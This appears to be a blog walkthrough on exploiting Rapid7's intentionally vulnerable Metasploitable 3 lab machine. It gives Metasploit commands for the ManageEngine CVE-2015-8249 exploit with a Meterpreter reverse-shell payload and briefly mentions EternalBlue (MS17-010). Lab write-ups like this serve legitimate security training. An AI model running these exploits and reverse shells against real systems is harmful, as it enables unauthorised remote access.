Metasploitable 3 Exploitation Guide
Hello all, in this post I will be going over the ways to exploit code and gain a shell on Rapid7’s Metasploitable 3 machine. Each vulnerability will be split into it’s own section and explained with links for reference, I will also go over ways to escalate privileges from LOCAL SERVICE shells to SYSTEM, by combining multiple exploits. Each week I will add more, so consider it a rolling post where I will update it with each new vulnerability I find and then exploit. The link to each section will as usual, be in the table of contents at the side of the page. If you have any questions feel free to reach out to me on my Twitter, or my Discord, both linked at the side. Without further ado, let’s get started.
Links and Resources
These are just some useful links and resources if you get stuck exploiting the machine.
- The projects GitHub Page
- A guide to installing Metasploitable3
- Meterpreter Basics
- Attacking Metasploitable 3 - Metasploit Minute - Mubix
- List of Metasploitable 3 Vulnerabilities
- Details of how Metasploitable 3 is configured
- Metasploit Download
- A Beginners Guide to Metasploit - HackerSploit
NMAP Scan of Metasploitable 3
To make our lives easier I will launch metasploit with the
msfdb run command to launch msf and start the database for credential storage, I will also use the
setg command to globally set the RHOST and LHOST to the IP of Metasploitable3 and our local IP respectively.
Exploiting Manage Engine - CVE-2015-8249
The first vulnerability we will be exploiting is to do with an outdated Manage Engine Desktop Central implementation, there is a CVE with a metasploit module and this allows for unauthenticated remote code execution as LOCAL SERVICE, the module we will be using is, exploit/windows/http/manageengine_connectionid_write, all we need to do is load up the module and run
exploit as we have already set the RHOST and LHOST with
setg. We also need to make sure that we are using a 64 bit payload as Metasploitable 3 is a 64 bit machine. We can set the correct payload with,
set payload windows/x64/meterpreter/reverse_tcp.
1 2 3 use exploit/windows/http/manageengine_connectionid_write set payload windows/x64/meterpreter/reverse_tcp exploit
Bingo, we got a shell as LOCAL SERVICE.
Here is a link to an in-depth article exploiting this vulnerability - Here
Exploiting EternalBlue, MS17-010
The next vulnerability we will exploit is MS17-010, EternalBlue. To exploit this vulnerability, it is quite simple, all we need to do is load the module in metasploit and then run the exploit.
Bingo, we got a shell as system.